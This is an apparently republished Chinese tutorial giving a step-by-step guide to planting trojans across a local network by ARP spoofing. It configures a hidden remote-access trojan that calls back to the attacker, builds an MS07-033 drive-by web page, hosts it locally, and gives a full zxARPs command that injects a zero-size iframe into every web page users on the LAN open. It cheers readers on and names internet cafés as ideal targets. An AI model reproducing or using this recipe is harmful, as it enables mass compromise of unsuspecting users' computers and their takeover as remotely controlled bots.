熱點推薦:
您现在的位置: 電腦知識網 >> 網絡技術 >> 正文

如何在局域網掛arp木馬

2022-06-13   來源: 網絡技術 

  網頁掛馬最難的就是傳播了,小網站易入侵但是訪問人數不多,收獲的肉雞也就不是很多。因此,一種新的掛馬方式開始流行——局域網ARP欺騙掛馬,只要局域網內一台機子中招了,它就可以在內網傳播含有木馬的網頁,捕獲的肉雞就會成幾何倍數增長。
  局域網ARP欺騙掛馬的好處如下:無需入侵網站,只要你的主機處於局域網中即可,這是它最大的優點;收獲的肉雞多多,短時間內可以收獲數十台甚至上百台肉雞,類似網吧這樣由上百台電腦組成的局域網是最好的掛馬場所;局域網內的用戶訪問任何網站都會中木馬。看了上面的介紹,各位是不是已經蠢蠢欲動了?
第一步:配置木馬服務端
  我們以《黑洞》木馬為例。運行《黑洞》木馬的Client.exe文件,進入Client.exe的主界面後,點擊“文件→創建DLL插入版本服務端程序”。
  進入服務端程序的創建界面後,首先勾選“Win NT/2000/XP/2003下隱藏服務端文件、注冊表、進程和服務”,然後切換到“連接選項”標簽,在“主機”一欄中填入本機的公網IP地址,端口可以保持默認的“2007”。最後在“連接密碼”處填入用來連接對方的密碼,例如123456。設置完成後點擊“生成”按鈕,將木馬服務端保存為muma.exe。

第二步:生成網頁木馬
  既然是掛馬,那當然缺不了網頁木馬了。tw.wiNgwit.CoM這裡我們用“MS07-33網馬生成器”為例。運行“MS07-33網馬生成器”,在“網馬地址”文本框中輸入木馬所在路徑,由於等會我們要自行架設HTTP服務,所以這裡應該填入“http://192.168.0.2/muma.exe“,其中192.168.0.2是本機在局域網中的IP地址。點擊“生成網馬”按鈕即可生成網馬hackll.htm。

第三步:開啟本機HTTP服務
  要讓局域網中的其他主機能夠訪問到我們的網馬,就要開啟本機的Http服務。下載Baby Web Server,這是一款簡單的Web服務器軟件,下載後直接運行,在其主界面中點擊“服務→設置”。
  將“網頁目錄”設置為網頁木馬所在的地方,例如C盤根目錄“C:\“。點“確定”回主界面,然後再點“Start”按鈕開啟本機的Http服務。記住要將木馬服務端和網頁木馬放到C盤根目錄。

第四步:局域網掛馬
  最後該請我們的主角出場了,就是上文中提到的小工具,這個工具叫zxARPs,是一個通過ARP欺騙實現局域網掛馬的工具。在使用zxARPs前我們要安裝WinPcap,它是網絡底層驅動包,沒有它zxARPs就運行不了。
  安裝好後將zxARPs放到任意目錄,然後運行“命令提示符”,進入zxARPs所在的目錄,然後輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert “<iframe src=‘http://192.168.0.2/hackll.htm’ width=0 height=0>”。回車後掛馬就成功了。
  從現在開始,局域網中的用戶無論訪問什麼網站,都會運行我們的網頁木馬,因為zxARPs在用戶打開網頁的同時已經將掛馬代碼插入到正常網頁中了。

 
From:http://tw.wingwit.com/Article/Network/201309/383.html
  • 上一篇文章:

  • 下一篇文章:
  • 推薦文章
    Copyright © 2005-2022 電腦知識網 Computer Knowledge   All rights reserved.